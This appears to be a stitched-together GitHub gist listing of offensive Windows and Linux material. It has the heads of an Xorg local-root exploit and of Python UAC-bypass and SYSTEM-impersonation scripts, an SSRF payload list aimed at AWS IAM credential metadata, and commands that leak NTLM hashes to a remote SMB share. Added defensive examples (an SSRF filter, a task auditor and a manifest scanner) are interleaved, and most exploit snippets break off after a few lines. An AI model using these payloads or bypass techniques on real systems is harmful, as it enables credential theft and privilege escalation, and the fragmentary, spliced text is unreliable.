makelaris makelariss

#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 30, 2024 09:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
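The dictionary above is the offensive side of IMDS-targeted SSRF; the check a practitioner wants next to it is the server-side filter that refuses those destinations, including the alternate spellings of the same address that naive string matching misses. This is an added example, not part of the gist: the IPv6 IMDS endpoint fd00:ec2::254, the loopback ranges and the decimal/hex host encodings are assumptions added here. Hostnames are deliberately not resolved in this function; resolve and re-check the resolved address at connect time, otherwise DNS rebinding bypasses the filter.

```python
import ipaddress
from urllib.parse import urlsplit

# Destinations an SSRF filter should refuse. 169.254.0.0/16 covers the AWS
# IMDS address 169.254.169.254 listed above; fd00:ec2::254 is the AWS IPv6
# IMDS endpoint (assumption, not stated on this page).
BLOCKED_NETWORKS = [
    ipaddress.ip_network("169.254.0.0/16"),
    ipaddress.ip_network("fd00:ec2::254/128"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("::1/128"),
]


def parse_host_as_ip(host):
    """Return an ip_address for hosts written as dotted quad, IPv6 literal,
    bare decimal (2852039166) or hex (0xa9fea9fe) integer; None for names."""
    host = host.strip("[]")
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        # int(x, 0) accepts 0x.. hex; a plain digit string is decimal.
        return ipaddress.ip_address(int(host, 0))
    except ValueError:
        return None


def is_metadata_target(url):
    """True if the URL's host is an IP literal inside a blocked range."""
    host = urlsplit(url).hostname  # lower-cased, brackets already stripped
    if host is None:
        return False
    ip = parse_host_as_ip(host)
    if ip is None:
        return False  # a hostname: resolve it and re-check before connecting
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still IMDS
    return any(ip in net for net in BLOCKED_NETWORKS)


if __name__ == "__main__":
    # Constructed sample inputs: the IMDS URLs from the list plus encodings
    # that an attacker uses to slip past a substring match on "169.254".
    for u in [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://2852039166/latest/meta-data/",
        "http://0xa9fea9fe/latest/meta-data/",
        "http://[fd00:ec2::254]/latest/meta-data/",
        "http://[::ffff:169.254.169.254]/latest/",
        "https://example.com/",
    ]:
        print(f"{'BLOCK' if is_metadata_target(u) else 'allow':5} {u}")
```

The decimal and hex forms are accepted by most HTTP client libraries and by the kernel resolver, so a filter that only compares the literal string "169.254.169.254" is bypassable; comparing the parsed address against networks closes that gap for IP literals.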
@0rbz_
Executables for Capturing Hashes (incomplete list)
(all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing)
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share (noisy, pops an error dialog)
@makelariss
makelariss / uacbypassEnviromentVariableExpansion.py
Last active June 17, 2021 21:13
Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*-
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
'''
SilentCleanup has a "Highest" RunLevel, meaning the scheduled task is elevated to administrator without any prompting.
It also contains environment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe). Environment variables are stored in the HKCU registry hive, which is write accessible by the user (HKCU\Environment).
We can perform an AlwaysNotify UAC bypass by changing the 'windir' environment variable's value to our own payload and triggering it through the SilentCleanup scheduled task.
'''
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
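The condition the gist above abuses (a task with an elevated run level whose command path is expanded from an environment variable the user controls) can be audited offline from exported task XML (`schtasks /query /xml`, or the files under C:\Windows\System32\Tasks) without touching the registry. This is an added example and not part of the gist; the task XML below is a constructed sample modelled on SilentCleanup, and the attacker-controlled `windir` value is a hypothetical to show the resulting path. Real exports are UTF-16 files: decode them and drop the `<?xml ...?>` declaration before passing the text to `audit_task`.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
ENV_REF = re.compile(r"%([^%]+)%")

# Constructed sample modelled on the SilentCleanup task: HighestAvailable
# run level, command path expanded from %windir%.
SILENTCLEANUP_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <GroupId>S-1-5-32-545</GroupId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\cleanmgr.exe</Command>
      <Arguments>/autoclean /d %systemdrive%</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed control cases: same path but not elevated, and elevated but
# with an absolute path that no user variable can redirect.
LEASTPRIV_XML = SILENTCLEANUP_XML.replace("HighestAvailable", "LeastPrivilege")
ABSOLUTE_XML = SILENTCLEANUP_XML.replace(
    r"%windir%\system32\cleanmgr.exe", r"C:\Windows\System32\cleanmgr.exe")


def audit_task(xml_text, user_env=None):
    """Return a list of findings for an elevated task whose command path
    goes through an environment variable, or None if the task is clean.

    user_env maps lower-case variable names to values a standard user could
    set under HKCU\\Environment; it is used only to show the resulting path.
    """
    user_env = user_env or {}
    root = ET.fromstring(xml_text.strip())
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel",
                              default="", namespaces=NS)
    if run_level != "HighestAvailable":
        return None
    findings = []
    for exec_el in root.findall("t:Actions/t:Exec", NS):
        command = exec_el.findtext("t:Command", default="", namespaces=NS)
        refs = [r.lower() for r in ENV_REF.findall(command)]
        if not refs:
            continue  # absolute path: nothing for HKCU\Environment to redirect
        expanded = ENV_REF.sub(
            lambda m: user_env.get(m.group(1).lower(), m.group(0)), command)
        findings.append({"run_level": run_level, "command": command,
                         "env_vars": refs, "expands_to": expanded})
    return findings or None


if __name__ == "__main__":
    # Hypothetical per-user override, as the gist writes it to HKCU\Environment.
    attacker_env = {"windir": r"C:\Users\victim\payload"}
    for name, xml in [("SilentCleanup", SILENTCLEANUP_XML),
                      ("LeastPrivilege", LEASTPRIV_XML),
                      ("AbsolutePath", ABSOLUTE_XML)]:
        print(name, audit_task(xml, attacker_env))
```

Only `<Command>` is inspected; `<Arguments>` (here `%systemdrive%`) is passed to the already-chosen executable, so a variable there changes what cleanmgr.exe cleans, not which binary runs elevated. The fix on the task side is the same one that removes the finding: an absolute command path.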
@makelariss
makelariss / popshellslikeitsafriday.py
Last active December 17, 2021 05:31
NT AUTHORITY\SYSTEM through Named Pipe Impersonation using Python
# -*- coding: UTF-8 -*-
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
@makelariss
makelariss / popshellslikeitsasaturday.py
Last active October 14, 2020 00:21
NT AUTHORITY\SYSTEM through Token Impersonation using Python
# -*- coding: UTF-8 -*-
# All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
@makelariss
makelariss / uacbypasstokenmanipulation.py
Last active February 29, 2024 19:21
Fileless AlwaysNotify UAC Bypass using CIA Vault7's Token Manipulation
# -*- coding: utf-8 -*-
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :))
# This is truly an Always Notify UAC bypass, because it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION, we look for processes with manifests that have <autoElevate></autoElevate> set to true.
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32 = WinDLL('shell32' , use_last_error=True)
@makelariss
makelariss / uacbypassSlui_exe.py
Last active September 30, 2019 17:34
Tested on Microsoft Windows [Version 10.0.16299.192]
# -*- coding: utf-8 -*-
# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation
'''
slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
'''
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
@makelariss
makelariss / autoelevate.lst
Created December 16, 2017 15:10
All Windows 10 RS3 [Version 10.0.16299] Binaries with <autoElevate></autoElevate> set to True
C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate>
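Both the token-manipulation gist above (which picks its target by looking for processes whose manifest has autoElevate set to true) and the autoelevate.lst listing depend on reading the manifest embedded in each binary. This added example, not part of either gist, shows how that list is produced: the RT_MANIFEST resource is stored as UTF-8 XML inside the .rsrc section, so a raw scan for the `<assembly ...>...</assembly>` envelope finds it without a PE parser. The byte blobs below are constructed stand-ins for PE files, and the assumption that a system binary carries a single manifest is labelled in the code. Note that the flag alone does not make a binary auto-elevate: Windows also requires it to be Microsoft-signed and to live in a secure location such as System32.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: one manifest per file, as is the case for Windows system
# binaries. \b stops the pattern matching <assemblyIdentity ...>.
MANIFEST_RE = re.compile(rb"<assembly\b.*?</assembly>", re.DOTALL)

# Constructed manifest in the shape of an auto-elevating system binary.
AUTOELEVATE_MANIFEST = b"""<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security><requestedPrivileges>
      <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
    </requestedPrivileges></security>
  </trustInfo>
  <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
    <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
      <autoElevate>true</autoElevate>
    </asmv3:windowsSettings>
  </asmv3:application>
</assembly>"""

# Constructed manifest of an ordinary asInvoker binary (no autoElevate element).
ASINVOKER_MANIFEST = b"""<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity name="example" version="1.0.0.0" type="win32"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security><requestedPrivileges>
      <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
    </requestedPrivileges></security>
  </trustInfo>
</assembly>"""


def fake_pe(manifest):
    """Constructed stand-in for a PE image: DOS stub, PE signature, padding
    where headers and code would be, then the manifest bytes as they sit in
    .rsrc, then trailing data."""
    return b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 200 + manifest + b"\x00" * 32


AUTOELEVATE_SAMPLE = fake_pe(AUTOELEVATE_MANIFEST)
ASINVOKER_SAMPLE = fake_pe(ASINVOKER_MANIFEST)


def extract_manifest(pe_bytes):
    """Return the embedded manifest XML as text, or None if there is none."""
    m = MANIFEST_RE.search(pe_bytes)
    return m.group(0).decode("utf-8", errors="replace") if m else None


def _local(tag):
    """Strip the namespace: '{http://...}autoElevate' -> 'autoElevate'."""
    return tag.rsplit("}", 1)[-1]


def manifest_elevation(manifest_xml):
    """Return (autoElevate, requestedExecutionLevel) from a manifest."""
    auto, level = False, None
    for el in ET.fromstring(manifest_xml).iter():
        name = _local(el.tag)
        if name == "autoElevate":
            auto = (el.text or "").strip().lower() == "true"
        elif name == "requestedExecutionLevel":
            level = el.get("level")
    return auto, level


def scan(name, pe_bytes):
    """One row of an autoelevate.lst-style report for a single binary."""
    mf = extract_manifest(pe_bytes)
    if mf is None:
        return {"file": name, "manifest": False, "autoElevate": False, "level": None}
    auto, level = manifest_elevation(mf)
    return {"file": name, "manifest": True, "autoElevate": auto, "level": level}


if __name__ == "__main__":
    # On a real system, read each file under C:\Windows\System32 in binary
    # mode and pass its bytes to scan(); the constructed blobs stand in here.
    for name, blob in [("constructed_autoelevate.exe", AUTOELEVATE_SAMPLE),
                       ("constructed_asinvoker.exe", ASINVOKER_SAMPLE),
                       ("no_manifest.bin", b"MZ\x00\x00")]:
        r = scan(name, blob)
        if r["autoElevate"]:
            print(f"{r['file']}: <autoElevate>true</autoElevate> ({r['level']})")
```

Filtering the report to rows where `autoElevate` is true and `level` is `requireAdministrator` or `highestAvailable` reproduces the listing above; binaries with `uiAccess="true"` are a separate case (they elevate to a different integrity level for accessibility purposes) and are worth flagging on their own.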
@makelariss
makelariss / popshellslikeitsatuesday.py
Last active January 13, 2023 09:41
NT AUTHORITY\SYSTEM through Handle Inheritance using Python
# -*- coding: UTF-8 -*-
import enum, os, sys
# https://twitter.com/highsenburger69
from ctypes.wintypes import *
from ctypes import *
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32 = WinDLL('shell32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)